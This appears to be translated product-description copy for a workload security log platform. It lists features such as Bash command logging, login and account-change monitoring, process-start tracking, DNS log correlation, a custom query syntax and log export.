Detailed workload Bash input log to meet the response of workload behavior, providing key information such as IP, terminal, user, and details.
Record the logs showing the workload connection, filter the meaningless Web access and ultra-short connection, and record the changes of the workload’s real network connection.
Provide all the log records including success, failure, logout, etc., and monitor changes of accounts and account groups, including additions, deletions, modifications, and changes of passwords and permissions.
Recording the information of the system's new start process, including the start time of the process and the user, the parent process, the command line, etc. It also can record the start site of any process and replay the attack process.
Obtain the Web DNS parsing log and associate it with the workload. Through the relationship between the domain name and the workload, the analysis log from the Web perspective is provided for the Web intrusion detection.
Self-developed QSL grammar, using "field name + connector + query keyword" retrieval method, has strong expansibility and flexibility, can query data across the log, find data features and security clues.
By default, it provides data time distribution analysis and supports the function of time drilling down, which can analyze data distribution in any period of time. It also supports common analysis functions such as total statistics and score statistics of any field in the log.
According to the characteristics of different logs, combined with security experience, the system provides a variety of log query angles, which can quickly find some data characteristics and facilitate further investigation. Query scenarios also allow customers to customize and facilitate secondary queries.
The system provides a variety of security log output functions, including API, SYSLOG, CSV file export, etc. It can quickly integrate with other data analysis platforms of enterprises for correlation analysis or secondary development.